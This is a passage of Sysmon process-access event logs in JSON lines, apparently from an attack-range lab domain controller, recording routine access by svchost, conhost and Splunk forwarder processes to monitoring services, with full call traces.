C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BE-5F25-0000-0010DB120600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BE-5F25-0000-0010DB120600}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.321\r\nSourceProcessGUID: {A837DB8D-02BE-5F25-0000-0010DB120600}\r\nSourceProcessId: 4908\r\nSourceThreadId: 4984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.321","SourceProcessGUID":"{A837DB8D-02BE-5F25-0000-0010DB120600}","SourceProcessId":"4908","SourceThreadId":"4984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program 